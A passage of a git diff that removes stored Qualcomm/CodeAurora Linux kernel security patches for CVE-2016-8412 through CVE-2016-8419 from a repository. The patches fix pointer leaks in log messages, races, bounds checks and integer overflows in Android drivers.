-@@ -3318,7 +3318,7 @@ int voc_map_rtac_block(struct rtac_cal_block_data *cal_block)
- 	if (!is_rtac_memory_allocated()) {
- 		result = voice_alloc_rtac_mem_map_table();
- 		if (result < 0) {
--			pr_err("%s: RTAC alloc mem map table did not work! addr = 0x%pa, size = %d\n",
-+			pr_err("%s: RTAC alloc mem map table did not work! addr = 0x%pK, size = %d\n",
- 				__func__,
- 				&cal_block->cal_data.paddr,
- 				cal_block->map_data.map_size);
-@@ -3333,7 +3333,7 @@ int voc_map_rtac_block(struct rtac_cal_block_data *cal_block)
- 		cal_block->map_data.map_size,
- 		VOC_RTAC_MEM_MAP_TOKEN);
- 	if (result < 0) {
--		pr_err("%s: RTAC mmap did not work! addr = 0x%pa, size = %d\n",
-+		pr_err("%s: RTAC mmap did not work! addr = 0x%pK, size = %d\n",
- 			__func__,
- 			&cal_block->cal_data.paddr,
- 			cal_block->map_data.map_size);
-@@ -4444,7 +4444,7 @@ int voc_start_record(uint32_t port_id, uint32_t set, uint32_t session_id)
- 
- 			break;
- 		}
--		pr_debug("%s: port_id: %d, set: %d, v: %p\n",
-+		pr_debug("%s: port_id: %d, set: %d, v: %pK\n",
- 			 __func__, port_id, set, v);
- 
- 		mutex_lock(&v->lock);
-@@ -6510,12 +6510,12 @@ static int voice_alloc_oob_shared_mem(void)
- 		cnt++;
- 	}
- 
--	pr_debug("%s buf[0].data:[%p], buf[0].phys:[%pa], &buf[0].phys:[%p],\n",
-+	pr_debug("%s buf[0].data:[%pK], buf[0].phys:[%pK], &buf[0].phys:[%pK],\n",
- 		 __func__,
- 		(void *)v->shmem_info.sh_buf.buf[0].data,
- 		&v->shmem_info.sh_buf.buf[0].phys,
- 		(void *)&v->shmem_info.sh_buf.buf[0].phys);
--	pr_debug("%s: buf[1].data:[%p], buf[1].phys[%pa], &buf[1].phys[%p]\n",
-+	pr_debug("%s: buf[1].data:[%pK], buf[1].phys[%pK], &buf[1].phys[%pK]\n",
- 		__func__,
- 		(void *)v->shmem_info.sh_buf.buf[1].data,
- 		&v->shmem_info.sh_buf.buf[1].phys,
-@@ -6557,7 +6557,7 @@ static int voice_alloc_oob_mem_table(void)
- 	}
- 
- 	v->shmem_info.memtbl.size = sizeof(struct vss_imemory_table_t);
--	pr_debug("%s data[%p]phys[%pa][%p]\n", __func__,
-+	pr_debug("%s data[%pK]phys[%pK][%pK]\n", __func__,
- 		 (void *)v->shmem_info.memtbl.data,
- 		 &v->shmem_info.memtbl.phys,
- 		 (void *)&v->shmem_info.memtbl.phys);
-@@ -6909,7 +6909,7 @@ static int voice_alloc_cal_mem_map_table(void)
- 	}
- 
- 	common.cal_mem_map_table.size = sizeof(struct vss_imemory_table_t);
--	pr_debug("%s: data %p phys %pa\n", __func__,
-+	pr_debug("%s: data %pK phys %pK\n", __func__,
- 		 common.cal_mem_map_table.data,
- 		 &common.cal_mem_map_table.phys);
- 
-@@ -6936,7 +6936,7 @@ static int voice_alloc_rtac_mem_map_table(void)
- 	}
- 
- 	common.rtac_mem_map_table.size = sizeof(struct vss_imemory_table_t);
--	pr_debug("%s: data %p phys %pa\n", __func__,
-+	pr_debug("%s: data %pK phys %pK\n", __func__,
- 		 common.rtac_mem_map_table.data,
- 		 &common.rtac_mem_map_table.phys);
- 
-@@ -7537,7 +7537,7 @@ static int voice_alloc_source_tracking_shared_memory(void)
- 	memset((void *)(common.source_tracking_sh_mem.sh_mem_block.data), 0,
- 		   common.source_tracking_sh_mem.sh_mem_block.size);
- 
--	pr_debug("%s: sh_mem_block: phys:[%pa], data:[0x%p], size:[%zd]\n",
-+	pr_debug("%s: sh_mem_block: phys:[%pK], data:[0x%pK], size:[%zd]\n",
- 		 __func__,
- 		&(common.source_tracking_sh_mem.sh_mem_block.phys),
- 		(void *)(common.source_tracking_sh_mem.sh_mem_block.data),
-@@ -7568,7 +7568,7 @@ static int voice_alloc_source_tracking_shared_memory(void)
- 	memset((void *)(common.source_tracking_sh_mem.sh_mem_table.data), 0,
- 		common.source_tracking_sh_mem.sh_mem_table.size);
- 
--	pr_debug("%s sh_mem_table: phys:[%pa], data:[0x%p], size:[%zd],\n",
-+	pr_debug("%s sh_mem_table: phys:[%pK], data:[0x%pK], size:[%zd],\n",
- 		 __func__,
- 		&(common.source_tracking_sh_mem.sh_mem_table.phys),
- 		(void *)(common.source_tracking_sh_mem.sh_mem_table.data),
-diff --git a/sound/soc/msm/qdsp6v2/rtac.c b/sound/soc/msm/qdsp6v2/rtac.c
-index b1954a4..feed251 100644
---- a/sound/soc/msm/qdsp6v2/rtac.c
-+++ b/sound/soc/msm/qdsp6v2/rtac.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -177,7 +177,7 @@ int rtac_allocate_cal_buffer(uint32_t cal_type)
- 	}
- 
- 	if (rtac_cal[cal_type].cal_data.paddr != 0) {
--		pr_err("%s: memory already allocated! cal_type %d, paddr 0x%pa\n",
-+		pr_err("%s: memory already allocated! cal_type %d, paddr 0x%pK\n",
- 		       __func__, cal_type, &rtac_cal[cal_type].cal_data.paddr);
- 		result = -EPERM;
- 		goto done;
-@@ -196,7 +196,7 @@ int rtac_allocate_cal_buffer(uint32_t cal_type)
- 		goto done;
- 	}
- 
--	pr_debug("%s: cal_type %d, paddr 0x%pa, kvaddr 0x%p, map_size 0x%x\n",
-+	pr_debug("%s: cal_type %d, paddr 0x%pK, kvaddr 0x%pK, map_size 0x%x\n",
- 		__func__, cal_type,
- 		&rtac_cal[cal_type].cal_data.paddr,
- 		rtac_cal[cal_type].cal_data.kvaddr,
-@@ -226,7 +226,7 @@ int rtac_free_cal_buffer(uint32_t cal_type)
- 	result = msm_audio_ion_free(rtac_cal[cal_type].map_data.ion_client,
- 				rtac_cal[cal_type].map_data.ion_handle);
- 	if (result < 0) {
--		pr_err("%s: ION free for RTAC failed! cal_type %d, paddr 0x%pa\n",
-+		pr_err("%s: ION free for RTAC failed! cal_type %d, paddr 0x%pK\n",
- 		       __func__, cal_type, &rtac_cal[cal_type].cal_data.paddr);
- 		goto done;
- 	}
-@@ -671,7 +671,7 @@ static int get_voice_index(u32 mode, u32 handle)
- /* ADM APR */
- void rtac_set_adm_handle(void *handle)
- {
--	pr_debug("%s: handle = %p\n", __func__, handle);
-+	pr_debug("%s: handle = %pK\n", __func__, handle);
- 
- 	mutex_lock(&rtac_adm_apr_mutex);
- 	rtac_adm_apr_data.apr_handle = handle;
-@@ -729,7 +729,7 @@ u32 send_adm_apr(void *buf, u32 opcode)
- 
- 	if (copy_from_user(&user_buf_size, (void *)buf,
- 						sizeof(user_buf_size))) {
--		pr_err("%s: Copy from user failed! buf = 0x%p\n",
-+		pr_err("%s: Copy from user failed! buf = 0x%pK\n",
- 		       __func__, buf);
- 		goto done;
- 	}
-@@ -829,7 +829,7 @@ u32 send_adm_apr(void *buf, u32 opcode)
- 	memcpy(rtac_adm_buffer, &adm_params, sizeof(adm_params));
- 	atomic_set(&rtac_adm_apr_data.cmd_state, 1);
- 
--	pr_debug("%s: Sending RTAC command ioctl 0x%x, paddr 0x%pa\n",
-+	pr_debug("%s: Sending RTAC command ioctl 0x%x, paddr 0x%pK\n",
- 		__func__, opcode,
- 		&rtac_cal[ADM_RTAC_CAL].cal_data.paddr);
- 
-@@ -948,7 +948,7 @@ u32 send_rtac_asm_apr(void *buf, u32 opcode)
- 
- 	if (copy_from_user(&user_buf_size, (void *)buf,
- 						sizeof(user_buf_size))) {
--		pr_err("%s: Copy from user failed! buf = 0x%p\n",
-+		pr_err("%s: Copy from user failed! buf = 0x%pK\n",
- 		       __func__, buf);
- 		goto done;
- 	}
-@@ -1048,7 +1048,7 @@ u32 send_rtac_asm_apr(void *buf, u32 opcode)
- 	memcpy(rtac_asm_buffer, &asm_params, sizeof(asm_params));
- 	atomic_set(&rtac_asm_apr_data[session_id].cmd_state, 1);
- 
--	pr_debug("%s: Sending RTAC command ioctl 0x%x, paddr 0x%pa\n",
-+	pr_debug("%s: Sending RTAC command ioctl 0x%x, paddr 0x%pK\n",
- 		__func__, opcode,
- 		&rtac_cal[ASM_RTAC_CAL].cal_data.paddr);
- 
-@@ -1188,7 +1188,7 @@ static u32 send_rtac_afe_apr(void *buf, uint32_t opcode)
- 
- 	if (copy_from_user(&user_afe_buf, (void *)buf,
- 		sizeof(struct rtac_afe_user_data))) {
--		pr_err("%s: Copy from user failed! buf = 0x%p\n",
-+		pr_err("%s: Copy from user failed! buf = 0x%pK\n",
- 		       __func__, buf);
- 		goto done;
- 	}
-@@ -1304,7 +1304,7 @@ static u32 send_rtac_afe_apr(void *buf, uint32_t opcode)
- 
- 	atomic_set(&rtac_afe_apr_data.cmd_state, 1);
- 
--	pr_debug("%s: Sending RTAC command ioctl 0x%x, paddr 0x%pa\n",
-+	pr_debug("%s: Sending RTAC command ioctl 0x%x, paddr 0x%pK\n",
- 		__func__, opcode,
- 		&rtac_cal[AFE_RTAC_CAL].cal_data.paddr);
- 
-@@ -1428,7 +1428,7 @@ u32 send_voice_apr(u32 mode, void *buf, u32 opcode)
- 
- 	if (copy_from_user(&user_buf_size, (void *)buf,
- 						sizeof(user_buf_size))) {
--		pr_err("%s: Copy from user failed! buf = 0x%p\n",
-+		pr_err("%s: Copy from user failed! buf = 0x%pK\n",
- 		       __func__, buf);
- 		goto done;
- 	}
-@@ -1529,7 +1529,7 @@ u32 send_voice_apr(u32 mode, void *buf, u32 opcode)
- 	memcpy(rtac_voice_buffer, &voice_params, sizeof(voice_params));
- 	atomic_set(&rtac_voice_apr_data[mode].cmd_state, 1);
- 
--	pr_debug("%s: Sending RTAC command ioctl 0x%x, paddr 0x%pa\n",
-+	pr_debug("%s: Sending RTAC command ioctl 0x%x, paddr 0x%pK\n",
- 		__func__, opcode,
- 		&rtac_cal[VOICE_RTAC_CAL].cal_data.paddr);
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8412/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8412/ANY/0001.patch
deleted file mode 100644
index 2c1b2231..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8412/ANY/0001.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From 42a98c44669d92dafcf4d6336bdccaeb2db12786 Mon Sep 17 00:00:00 2001
-From: Sureshnaidu Laveti <lsuresh@codeaurora.org>
-Date: Mon, 3 Oct 2016 04:01:32 -0700
-Subject: msm: sensor: Adding mutex for actuator power down operations
-
-Protecting operations performed during actuator powerdown
-from race condition by adding mutex.
-CRs-Fixed: 1071891
-
-Change-Id: I7d6b2e8878788615c02678a4a28d31dca0ed6bca
-Signed-off-by: Sureshnaidu Laveti <lsuresh@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c b/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-index bf39738..a700f83 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-@@ -1559,11 +1559,13 @@ static long msm_actuator_subdev_ioctl(struct v4l2_subdev *sd,
- 			pr_err("a_ctrl->i2c_client.i2c_func_tbl NULL\n");
- 			return -EINVAL;
- 		}
-+		mutex_lock(a_ctrl->actuator_mutex);
- 		rc = msm_actuator_power_down(a_ctrl);
- 		if (rc < 0) {
- 			pr_err("%s:%d Actuator Power down failed\n",
- 					__func__, __LINE__);
- 		}
-+		mutex_unlock(a_ctrl->actuator_mutex);
- 		return msm_actuator_close(sd, NULL);
- 	default:
- 		return -ENOIOCTLCMD;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8413/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8413/ANY/0001.patch
deleted file mode 100644
index 9088b767..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8413/ANY/0001.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From bc77232707df371ff6bab9350ae39676535c0e9d Mon Sep 17 00:00:00 2001
-From: Krishnankutty Kolathappilly <kkolatha@codeaurora.org>
-Date: Wed, 16 Nov 2016 18:22:58 -0800
-Subject: msm: cpp: Fix for buffer overflow in cpp.
-
-Fix for buffer overflow while handling ioctl.
-Instead of checking for length boundary, fix checks
-for exact length.
-
-CRs-Fixed: 518731
-Change-Id: I9002f84b219e8b06ae0672d87c2d999e728a75aa
-Signed-off-by: Krishnankutty Kolathappilly <kkolatha@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c | 3 +--
- 1 file changed, 1 insertion(+), 2 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-index 022dd6b..0792380 100644
---- a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-+++ b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-@@ -2070,8 +2070,7 @@ long msm_cpp_subdev_ioctl(struct v4l2_subdev *sd,
- 		uint32_t identity;
- 		struct msm_cpp_buff_queue_info_t *buff_queue_info;
- 		CPP_DBG("VIDIOC_MSM_CPP_DEQUEUE_STREAM_BUFF_INFO\n");
--		if ((ioctl_ptr->len == 0) ||
--		    (ioctl_ptr->len > sizeof(uint32_t))) {
-+		if (ioctl_ptr->len != sizeof(uint32_t)) {
- 			mutex_unlock(&cpp_dev->mutex);
- 			return -EINVAL;
- 		}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8414/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8414/ANY/0001.patch
deleted file mode 100644
index b3c39fb7..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8414/ANY/0001.patch
+++ /dev/null
@@ -1,52 +0,0 @@
-From 320970d3da9b091e96746424c44649a91852a846 Mon Sep 17 00:00:00 2001
-From: Swetha Chikkaboraiah <schikk@codeaurora.org>
-Date: Wed, 2 Nov 2016 16:49:41 +0530
-Subject: qcom: scm: remove printing input arguments
-
-scm_call2 is printing the input arguments if TZ ret value is  < 0
-leading to information leak. Remove printing input arguments.
-
-Change-Id: I21dd6d83fa979aed2c79ebb2c9c8de63a247dded
-CRs-Fixed: 1076407
-Signed-off-by: Swetha Chikkaboraiah <schikk@codeaurora.org>
----
- drivers/soc/qcom/scm.c | 12 +++---------
- 1 file changed, 3 insertions(+), 9 deletions(-)
-
-diff --git a/drivers/soc/qcom/scm.c b/drivers/soc/qcom/scm.c
-index 795f33d..d057328 100644
---- a/drivers/soc/qcom/scm.c
-+++ b/drivers/soc/qcom/scm.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2010-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -644,10 +644,6 @@ int scm_call2(u32 fn_id, struct scm_desc *desc)
- 
- 		desc->ret[0] = desc->ret[1] = desc->ret[2] = 0;
- 
--		pr_debug("scm_call: func id %#llx, args: %#x, %#llx, %#llx, %#llx, %#llx\n",
--			x0, desc->arginfo, desc->args[0], desc->args[1],
--			desc->args[2], desc->x5);
--
- 		if (scm_version == SCM_ARMV8_64)
- 			ret = __scm_call_armv8_64(x0, desc->arginfo,
- 						  desc->args[0], desc->args[1],
-@@ -667,10 +663,8 @@ int scm_call2(u32 fn_id, struct scm_desc *desc)
- 	}  while (ret == SCM_V2_EBUSY && (retry_count++ < SCM_EBUSY_MAX_RETRY));
- 
- 	if (ret < 0)
--		pr_err("scm_call failed: func id %#llx, arginfo: %#x, args: %#llx, %#llx, %#llx, %#llx, ret: %d, syscall returns: %#llx, %#llx, %#llx\n",
--			x0, desc->arginfo, desc->args[0], desc->args[1],
--			desc->args[2], desc->x5, ret, desc->ret[0],
--			desc->ret[1], desc->ret[2]);
-+		pr_err("scm_call failed: func id %#llx, ret: %d, syscall returns: %#llx, %#llx, %#llx\n",
-+			x0, ret, desc->ret[0], desc->ret[1], desc->ret[2]);
- 
- 	if (arglen > N_REGISTER_ARGS)
- 		kfree(desc->extra_arg_buf);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8415/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2016-8415/qcacld-2.0/0001.patch
deleted file mode 100644
index 181f800f..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8415/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From 188e12a816508b11771f362c852782ec9a6f9394 Mon Sep 17 00:00:00 2001
-From: Jeff Johnson <jjohnson@codeaurora.org>
-Date: Wed, 19 Oct 2016 07:25:33 -0700
-Subject: qcacld-2.0: Fix hdd_ocb_config_new() signature
-
-hdd_ocb_config_new() takes four "length" parameters, currently defined
-to be of type 'int'. Since these are summed to calculate the size of a
-dynamic memory allocation they must be non-negative so change them to
-'uint32_t'.
-
-Change-Id: Ie66bbb7c69aba92d9d846cb90628110b3bea8f74
-CRs-Fixed: 1079596
----
- CORE/HDD/src/wlan_hdd_ocb.c | 11 ++++++-----
- 1 file changed, 6 insertions(+), 5 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_ocb.c b/CORE/HDD/src/wlan_hdd_ocb.c
-index b6494ca..95fde5e 100644
---- a/CORE/HDD/src/wlan_hdd_ocb.c
-+++ b/CORE/HDD/src/wlan_hdd_ocb.c
-@@ -406,10 +406,11 @@ static int hdd_ocb_register_sta(hdd_adapter_t *adapter)
-  *
-  * Return: A pointer to the OCB configuration struct, NULL on failure.
-  */
--static struct sir_ocb_config *hdd_ocb_config_new(int num_channels,
--						 int num_schedule,
--						 int ndl_chan_list_len,
--						 int ndl_active_state_list_len)
-+static
-+struct sir_ocb_config *hdd_ocb_config_new(uint32_t num_channels,
-+					  uint32_t num_schedule,
-+					  uint32_t ndl_chan_list_len,
-+					  uint32_t ndl_active_state_list_len)
- {
- 	struct sir_ocb_config *ret = 0;
- 	uint32_t len;
-@@ -903,7 +904,7 @@ static int __wlan_hdd_cfg80211_ocb_set_config(struct wiphy *wiphy,
- 	void *def_tx_param = NULL;
- 	uint32_t def_tx_param_size = 0;
- 	int i;
--	int channel_count, schedule_size;
-+	uint32_t channel_count, schedule_size;
- 	struct sir_ocb_config *config;
- 	int rc = -EINVAL;
- 	uint8_t *mac_addr;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8416/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8416/ANY/0001.patch
deleted file mode 100644
index b08ceefb..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8416/ANY/0001.patch
+++ /dev/null
@@ -1,73 +0,0 @@
-From e3af5e89426f1c8d4e703d415eff5435b925649f Mon Sep 17 00:00:00 2001
-From: Benet Clark <benetc@codeaurora.org>
-Date: Thu, 10 Nov 2016 17:49:09 -0800
-Subject: msm: mdss: Clear compat structures before copying to user
-
-In the compat layer, the temporary structures used to convert
-data from 32bit to 64bit structures need to be set to 0 before
-being assigned values.
-
-CRs-Fixed: 1088206
-Change-Id: I04497bc11e01c3df4beadfd6d9b06ab4321f1723
-Signed-off-by: Benet Clark <benetc@codeaurora.org>
----
- drivers/video/msm/mdss/mdss_compat_utils.c | 8 ++++++++
- 1 file changed, 8 insertions(+)
-
-diff --git a/drivers/video/msm/mdss/mdss_compat_utils.c b/drivers/video/msm/mdss/mdss_compat_utils.c
-index 5ad51dd..a9ab5c1 100644
---- a/drivers/video/msm/mdss/mdss_compat_utils.c
-+++ b/drivers/video/msm/mdss/mdss_compat_utils.c
-@@ -846,6 +846,7 @@ static int __from_user_pcc_coeff_v17(
- 		return -EFAULT;
- 	}
- 
-+	memset(&pcc_cfg_payload, 0, sizeof(pcc_cfg_payload));
- 	pcc_cfg_payload.r.b = pcc_cfg_payload32.r.b;
- 	pcc_cfg_payload.r.g = pcc_cfg_payload32.r.g;
- 	pcc_cfg_payload.r.c = pcc_cfg_payload32.r.c;
-@@ -1127,6 +1128,8 @@ static int __from_user_igc_lut_data_v17(
- 		pr_err("failed to copy payload from user for igc\n");
- 		return -EFAULT;
- 	}
-+
-+	memset(&igc_cfg_payload, 0, sizeof(igc_cfg_payload));
- 	igc_cfg_payload.c0_c1_data = compat_ptr(igc_cfg_payload_32.c0_c1_data);
- 	igc_cfg_payload.c2_data = compat_ptr(igc_cfg_payload_32.c2_data);
- 	igc_cfg_payload.len = igc_cfg_payload_32.len;
-@@ -1261,6 +1264,7 @@ static int __from_user_pgc_lut_data_v1_7(
- 		pr_err("failed to copy from user the pgc32 payload\n");
- 		return -EFAULT;
- 	}
-+	memset(&pgc_cfg_payload, 0, sizeof(pgc_cfg_payload));
- 	pgc_cfg_payload.c0_data = compat_ptr(pgc_cfg_payload_32.c0_data);
- 	pgc_cfg_payload.c1_data = compat_ptr(pgc_cfg_payload_32.c1_data);
- 	pgc_cfg_payload.c2_data = compat_ptr(pgc_cfg_payload_32.c2_data);
-@@ -1470,6 +1474,7 @@ static int __from_user_hist_lut_data_v1_7(
- 		return -EFAULT;
- 	}
- 
-+	memset(&hist_lut_cfg_payload, 0, sizeof(hist_lut_cfg_payload));
- 	hist_lut_cfg_payload.len = hist_lut_cfg_payload32.len;
- 	hist_lut_cfg_payload.data = compat_ptr(hist_lut_cfg_payload32.data);
- 
-@@ -2024,6 +2029,7 @@ static int __from_user_pa_data_v1_7(
- 		return -EFAULT;
- 	}
- 
-+	memset(&pa_cfg_payload, 0, sizeof(pa_cfg_payload));
- 	pa_cfg_payload.mode = pa_cfg_payload32.mode;
- 	pa_cfg_payload.global_hue_adj = pa_cfg_payload32.global_hue_adj;
- 	pa_cfg_payload.global_sat_adj = pa_cfg_payload32.global_sat_adj;
-@@ -2280,6 +2286,8 @@ static int __from_user_gamut_cfg_data_v17(
- 		pr_err("failed to copy the gamut payload from userspace\n");
- 		return -EFAULT;
- 	}
-+
-+	memset(&gamut_cfg_payload, 0, sizeof(gamut_cfg_payload));
- 	gamut_cfg_payload.mode = gamut_cfg_payload32.mode;
- 	for (i = 0; i < MDP_GAMUT_TABLE_NUM_V1_7; i++) {
- 		gamut_cfg_payload.tbl_size[i] =
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8417/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8417/ANY/0001.patch
deleted file mode 100644
index 7a915874..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8417/ANY/0001.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From 01dcc0a7cc23f23a89adf72393d5a27c6d576cd0 Mon Sep 17 00:00:00 2001
-From: Krishnankutty Kolathappilly <kkolatha@codeaurora.org>
-Date: Mon, 14 Nov 2016 18:46:12 -0800
-Subject: msm: camera: fix bound check of offset to avoid overread overwrite
-
-fix bound check of hw_cmd_p->offset in msm_jpeg_hw_exec_cmds
-to avoid overread overwrite.
-
-CRs-Fixed: 1088824
-
-Change-Id: Ifaa4b5387d4285ddce16d8e745aa0500c64c568b
-Signed-off-by: Krishnankutty Kolathappilly <kkolatha@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_hw.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_hw.c b/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_hw.c
-index d67ab11..9bc37a0 100644
---- a/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_hw.c
-+++ b/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_hw.c
-@@ -501,7 +501,7 @@ int msm_jpeg_hw_exec_cmds(struct msm_jpeg_hw_cmd *hw_cmd_p, uint32_t m_cmds,
- 	uint32_t data;
- 
- 	while (m_cmds--) {
--		if (hw_cmd_p->offset > max_size) {
-+		if (hw_cmd_p->offset >= max_size) {
- 			JPEG_PR_ERR("%s:%d] %d exceed hw region %d\n", __func__,
- 				__LINE__, hw_cmd_p->offset, max_size);
- 			return -EFAULT;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8418/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8418/ANY/0001.patch
deleted file mode 100644
index 5106e47e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8418/ANY/0001.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From 8f8066581a8e575a7d57d27f36c4db63f91ca48f Mon Sep 17 00:00:00 2001
-From: Zhen Kong <zkong@codeaurora.org>
-Date: Mon, 24 Oct 2016 13:52:04 -0700
-Subject: msm: crypto: Fix integer over flow check in qce driver
-
-Integer overflow check is invalid when ULONG_MAX is used,
-as ULONG_MAX has typeof 'unsigned long', while areq->assoclen,
-q_req->crytlen, and qreq.ivsize are 'unsigned int'. Make change
-to use UINT_MAX instead of ULONG_MAX.
-
-Change-Id: If2bb1900c07af1ea162da362c913d4880b0bc755
-Signed-off-by: Zhen Kong <zkong@codeaurora.org>
----
- drivers/crypto/msm/qce.c | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/crypto/msm/qce.c b/drivers/crypto/msm/qce.c
-index 7ddbb19..4cf95b9 100644
---- a/drivers/crypto/msm/qce.c
-+++ b/drivers/crypto/msm/qce.c
-@@ -1,6 +1,6 @@
- /* Qualcomm Crypto Engine driver.
-  *
-- * Copyright (c) 2010-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -1962,8 +1962,8 @@ int qce_aead_req(void *handle, struct qce_req *q_req)
- 	else
- 		q_req->cryptlen = areq->cryptlen - authsize;
- 
--	if ((q_req->cryptlen > ULONG_MAX - ivsize) ||
--		(q_req->cryptlen + ivsize > ULONG_MAX - areq->assoclen)) {
-+	if ((q_req->cryptlen > UINT_MAX - ivsize) ||
-+		(q_req->cryptlen + ivsize > UINT_MAX - areq->assoclen)) {
- 		pr_err("Integer overflow on total aead req length.\n");
- 		return -EINVAL;
- 	}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8419/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2016-8419/qcacld-2.0/0001.patch
deleted file mode 100644
index fd371144..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8419/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,117 +0,0 @@
-From 9ba50d536227666a5b6abd51f2b122675d950488 Mon Sep 17 00:00:00 2001
-From: Jeff Johnson <jjohnson@codeaurora.org>
-Date: Wed, 9 Nov 2016 09:01:10 -0800
-Subject: qcacld-2.0: Properly parse PNO vendor command
-
-Currently there is a single wlan_hdd_extscan_config_policy which
-contains entries for both EXTSCAN and PNO attributes. However the
-EXTSCAN and PNO attributes have separate and overlapping
-assignments. Therefore one policy cannot be used by both types of
-commands. In addition, when parsing nested PNO attributes the policy
-is not used, and hence no checking is performed on the nested
-data. This can result in a buffer overflow.
-
-To address these issues introduce a new policy for PNO vendor
-commands, and use that policy both when parsing the initial command
-and when parsing the nested attributes. Furthermore add a zero length
-SSID check to prevent underflow.
-
-Change-Id: I92c8fc7ca1c44971502ea68b5486a2b3ae941cc5
-CRs-Fixed: 1087209
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 45 +++++++++++++++++++++++++++-------------
- 1 file changed, 31 insertions(+), 14 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index c9e62c4..f488edc 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -842,11 +842,6 @@ wlan_hdd_extscan_config_policy[QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_
-     [QCA_WLAN_VENDOR_ATTR_EXTSCAN_SIGNIFICANT_CHANGE_PARAMS_LOST_AP_SAMPLE_SIZE] = { .type = NLA_U32 },
-     [QCA_WLAN_VENDOR_ATTR_EXTSCAN_SIGNIFICANT_CHANGE_PARAMS_MIN_BREACHING] = { .type = NLA_U32 },
-     [QCA_WLAN_VENDOR_ATTR_EXTSCAN_SIGNIFICANT_CHANGE_PARAMS_NUM_AP] = { .type = NLA_U32 },
--    [QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_NUM_NETWORKS] = { .type = NLA_U32 },
--    [QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORK_SSID] = { .type = NLA_BINARY,
--							.len = IEEE80211_MAX_SSID_LEN },
--    [QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORK_FLAGS] = { .type = NLA_U8 },
--    [QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORK_AUTH_BIT] = { .type = NLA_U8 },
-     [QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_THRESHOLD_PARAM_SSID] = { .type = NLA_BINARY,
- 							.len = IEEE80211_MAX_SSID_LEN + 1 },
